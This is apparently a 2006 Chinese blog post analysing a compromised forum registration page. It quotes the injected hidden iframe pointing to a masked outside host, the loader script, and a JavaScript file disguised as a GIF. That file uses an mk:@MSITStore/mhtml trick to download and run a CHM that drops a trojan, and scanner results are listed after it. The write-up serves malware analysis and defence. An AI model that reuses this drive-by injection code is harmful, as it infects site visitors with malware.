又一个带毒网页

endurer　原创

2006-04-08　第1版

网页：hxxp://www.***ai49.com/bbs/reg.asp

有2处被插入了代码：＜iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"＞＜/iframe＞

hxxp://down.***gament.net/q/f的代码为： 

---

＜script language="javascript" src="ah.js"＞＜/script＞  

---

ah.js的代码为：  

---

 GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('＜OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"＞＜/OBJECT＞'); 

---

 

 冒充GIF文件，下载运行1.js。
1.js其实是个CHM文件，会释放/运行.exe文件。Kaspersky报为Trojan-Downloader.Win32.Delf.aet，瑞星报为Trojan.DL.Small.hm。

File: 1.js Status:

INFECTED/MALWARE

MD5 617449ed78325096128e604f1e9f9d30 Packers detected:

-

Scanner results

AntiVir

Found Heuristic/Trojan.Downloader (probable variant)

ArcaVir

Found Trojan.Downloader.Delf.Aet

Avast

Found nothing

AVG Antivirus

Found nothing

BitDefender

Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET

ClamAV

Found Exploit.HTML.ObjCode-2

Dr.Web

Found Exploit.CodeBase, Trojan.DownLoader.6966

F-Prot Antivirus

Found HTML/ObjCode@expl

Fortinet

Found nothing

Kaspersky Anti-Virus

Found Trojan-Downloader.Win32.Delf.aet

NOD32

Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET

Norman Virus Control

Found nothing

UNA

Found nothing

VirusBuster

Found nothing

VBA32

Found Trojan-Downloader.Win32.Delf.aet